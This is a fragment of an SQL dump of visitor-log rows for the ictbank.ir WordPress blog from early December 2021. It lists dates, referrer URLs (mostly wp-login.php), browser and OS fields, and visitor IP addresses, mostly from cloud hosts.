(16773,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.100.177','000',0,1,0),
(16774,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.119.121.33','000',0,1,0),
(16775,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.17.75.115','000',0,1,0),
(16776,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.22.79.8','000',0,1,0),
(16777,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.244.120','000',0,1,0),
(16778,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.14.76.75','000',0,1,0),
(16779,'2021-12-04','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.141.193.214','000',0,1,0),
(16780,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.89.89.48','000',0,1,0),
(16781,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.14.252.179','000',0,1,0),
(16782,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.84.163','000',0,1,0),
(16783,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.221.128.227','000',0,1,0),
(16784,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.58.194.254','000',0,1,0),
(16785,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','34.215.156.146','000',0,1,0),
(16786,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.135.214.192','000',0,1,0),
(16787,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.90.189.202','000',0,1,0),
(16788,'2021-12-05','https://www.google.pl/','Firefox','Windows','10.0',NULL,NULL,'','109.196.114.62','000',0,1,0),
(16789,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.129.17.169','000',0,1,0),
(16790,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.119.14.200','000',0,1,0),
(16791,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.119.121.33','000',0,1,0),
(16792,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.208.56.103','000',0,1,0),
(16793,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.136.41','000',0,1,0),
(16794,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.69.153','000',0,1,0),
(16795,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.223.20.111','000',0,1,0),
(16796,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.72.156','000',0,1,0),
(16797,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.59.155.220','000',0,1,0),
(16798,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.205.188.157','000',0,1,0),
(16799,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.83.163.13','000',0,1,0),
(16800,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.224.109.65','000',0,1,0),
(16801,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.14.136.227','000',0,1,0),
(16802,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.116.14.254','000',0,1,0),
(16803,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.157.7.50','000',0,1,0),
(16804,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.161.234.153','000',0,1,0),
(16805,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.219.117.157','000',0,1,0),
(16806,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.89.146','000',0,1,0),
(16807,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.161.128.147','000',0,1,0),
(16808,'2021-12-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','176.9.8.180','000',0,1,0),
(16809,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','35.164.180.27','000',0,1,0),
(16810,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.91.139','000',0,1,0),
(16811,'2021-12-05','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','3.249.218.106','000',0,1,0),
(16812,'2021-12-05','http://design-arena.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','185.27.99.121','000',0,2,0),
(16813,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.72.14','000',0,1,0),
(16814,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.33.215','000',0,1,0),
(16815,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','35.170.200.110','000',0,1,0),
(16816,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.237.122.151','000',0,1,0),
(16817,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.25.145','000',0,1,0),
(16818,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.21.34.156','000',0,1,0),
(16819,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.141.44.175','000',0,1,0),
(16820,'2021-12-05','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(16821,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.139.86.59','000',0,1,0),
(16822,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.22.41.216','000',0,1,0),
(16823,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.124.244','000',0,1,0),
(16824,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.166.87.143','000',0,1,0),
(16825,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.18.212.147','000',0,1,0),
(16826,'2021-12-05','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.233','000',0,4,0),
(16827,'2021-12-05','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','3.249.144.145','000',0,1,0),
(16828,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','34.207.86.123','000',0,1,0),
(16829,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.235.238.190','000',0,1,0),
(16830,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.84.39.219','000',0,1,0),
(16831,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.83.55.254','000',0,1,0),
(16832,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.83.23.125','000',0,1,0),
(16833,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.144.195.213','000',0,1,0),
(16834,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.84.38.34','000',0,1,0),
(16835,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.198.145','000',0,1,0),
(16836,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.104.168','000',0,2,0),
(16837,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.131.94.182','000',0,1,0),
(16838,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.159.191.175','000',0,1,0),
(16839,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.91.201','000',0,1,0),
(16840,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.143.165','000',0,1,0),
(16841,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.86.102.89','000',0,1,0),
(16842,'2021-12-05','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.66','000',0,8,0),
(16843,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.217.96.42','000',0,1,0),
(16844,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.94.16','000',0,1,0),
(16845,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.219.76.200','000',0,1,0),
(16846,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.94.173.27','000',0,1,0),
(16847,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.174.158.247','000',0,1,0),
(16848,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.224.214.13','000',0,1,0),
(16849,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.19.240.2','000',0,1,0),
(16850,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.4.143','000',0,1,0),
(16851,'2021-12-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.213.8.23','000',0,2,0),
(16852,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.212.39.13','000',0,1,0),
(16853,'2021-12-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.186.124.127','000',0,2,0),
(16854,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','174.129.143.128','000',0,1,0),
(16855,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.124.197','000',0,1,0),
(16856,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.244.39','000',0,1,0),
(16857,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.204.155.187','000',0,1,0),
(16858,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.212.190.103','000',0,1,0),
(16859,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.222.54','000',0,1,0),
(16860,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.83.217.92','000',0,1,0),
(16861,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.91.131.166','000',0,1,0),
(16862,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.87.203.176','000',0,1,0),
(16863,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.113.156','000',0,1,0),
(16864,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.17.29.28','000',0,1,0),
(16865,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.58.178.137','000',0,1,0),
(16866,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.69.248','000',0,1,0),
(16867,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.149.131','000',0,1,0),
(16868,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.181.222','000',0,1,0),
(16869,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.29.72','000',0,1,0),
(16870,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.81.103.163','000',0,1,0),
(16871,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.192.192','000',0,1,0),
(16872,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.58.24.114','000',0,1,0),
(16873,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.129.210.30','000',0,1,0),
(16874,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','34.204.68.76','000',0,1,0),
(16875,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.201.228.125','000',0,1,0),
(16876,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.116.240.113','000',0,1,0),
(16877,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.94.128.198','000',0,1,0),
(16878,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.180.119','000',0,1,0),
(16879,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.111.114','000',0,1,0),
(16880,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.87.239.18','000',0,1,0),
(16881,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.87.69.76','000',0,1,0),
(16882,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.250.3','000',0,1,0),
(16883,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.205.154.131','000',0,1,0),
(16884,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.30.11','000',0,1,0),
(16885,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.119.110.224','000',0,1,0),
(16886,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.221.149.13','000',0,1,0),
(16887,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.129.194.48','000',0,1,0),
(16888,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.86.193','000',0,1,0),
(16889,'2021-12-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.220.77.193','000',0,1,0),
(16890,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.129.204.139','000',0,1,0),
(16891,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.231.41','000',0,1,0),
(16892,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.59.182.119','000',0,1,0),
(16893,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.138.189.21','000',0,1,0),
(16894,'2021-12-05','http://design-arena.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','20.121.16.221','000',0,4,0),
(16895,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.20.222','000',0,1,0),
(16896,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.223.123.100','000',0,1,0),
(16897,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.152.153','000',0,1,0),
(16898,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.203.94.34','000',0,1,0),
(16899,'2021-12-05','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','78.31.71.247','000',0,2,0),
(16900,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.22.63.31','000',0,1,0),
(16901,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.223.122.71','000',0,1,0),
(16902,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.207.255.25','000',0,1,0),
(16903,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.82.150.68','000',0,1,0),
(16904,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.207.206.244','000',0,1,0),
(16905,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.87.156.81','000',0,1,0),
(16906,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.116.44.138','000',0,1,0),
(16907,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.87.133.237','000',0,1,0),
(16908,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.133.155.48','000',0,1,0),
(16909,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.202.226.95','000',0,1,0),
(16910,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.15.53.213','000',0,1,0),
(16911,'2021-12-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.31.175.191','000',0,1,0),
(16912,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.15.36.88','000',0,1,0),
(16913,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.70.139.158','000',0,1,0),
(16914,'2021-12-05','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(16915,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.189.171.96','000',0,1,0),
(16916,'2021-12-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','178.155.5.245','000',0,4,0),
(16917,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','34.220.245.210','000',0,1,0),
(16918,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.144.67','000',0,1,0),
(16919,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.164.94','000',0,1,0),
(16920,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.101.255','000',0,1,0),
(16921,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.224.54.107','000',0,1,0),
(16922,'2021-12-05','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(16923,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.66.222','000',0,1,0),
(16924,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.89.20.170','000',0,1,0),
(16925,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.23.20.9','000',0,2,0),
(16926,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.94.86.230','000',0,1,0),
(16927,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.19.211.217','000',0,1,0),
(16928,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.219.2.128','000',0,1,0),
(16929,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.26.17','000',0,1,0),
(16930,'2021-12-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.166.216.191','000',0,1,0),
(16931,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.208.212.57','000',0,1,0),
(16932,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.221.169.49','000',0,1,0),
(16933,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.137.181.192','000',0,1,0),
(16934,'2021-12-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','142.93.44.71','000',0,1,0),
(16935,'2021-12-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','140.82.55.215','000',0,1,0),
(16936,'2021-12-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,1,0),
(16937,'2021-12-05','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(16938,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.21.100.108','000',0,1,0),
(16939,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.234.122','000',0,1,0),
(16940,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.121.170','000',0,1,0),
(16941,'2021-12-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.40.4.191','000',0,2,0),
(16942,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.221.130.251','000',0,1,0),
(16943,'2021-12-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','66.94.120.124','000',0,1,0),
(16944,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.86.229.215','000',0,1,0),
(16945,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.217.216.142','000',0,1,0),
(16946,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.137.206.75','000',0,1,0),
(16947,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.116.170.52','000',0,1,0),
(16948,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','107.22.138.127','000',0,1,0),
(16949,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.135.58','000',0,1,0),
(16950,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.205.13.1','000',0,1,0),
(16951,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.59.179.2','000',0,1,0),
(16952,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.172.2.167','000',0,1,0),
(16953,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.19.66.115','000',0,1,0),
(16954,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.206.126.102','000',0,1,0),
(16955,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.217.104.253','000',0,1,0),
(16956,'2021-12-05','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','159.89.41.141','000',0,2,0),
(16957,'2021-12-05','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','130.255.166.225','000',0,1,0),
(16958,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.139.235.117','000',0,1,0),
(16959,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.58.104.147','000',0,1,0),
(16960,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','34.239.116.99','000',0,1,0),
(16961,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.129.68.6','000',0,1,0),
(16962,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.236.65.37','000',0,1,0),
(16963,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.189.14.233','000',0,1,0),
(16964,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.168.220','000',0,1,0),
(16965,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.96.77','000',0,1,0),
(16966,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.198.26','000',0,1,0),
(16967,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.138.135.124','000',0,1,0),
(16968,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.58.199.127','000',0,1,0),
(16969,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.166.39.139','000',0,1,0),
(16970,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.205.103.107','000',0,1,0),
(16971,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','35.173.198.80','000',0,1,0),
(16972,'2021-12-05','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.232.6','000',0,1,0),
(16973,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.209.69.120','000',0,1,0),
(16974,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.21.165.182','000',0,1,0),
(16975,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.221.140.52','000',0,1,0),
(16976,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.138.36.101','000',0,1,0),
(16977,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.154.169','000',0,1,0),
(16978,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.152.243.101','000',0,1,0),
(16979,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','52.207.210.135','000',0,1,0),
(16980,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.237.52','000',0,1,0),
(16981,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.76.196','000',0,1,0),
(16982,'2021-12-06','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.189.26.205','000',0,1,0),
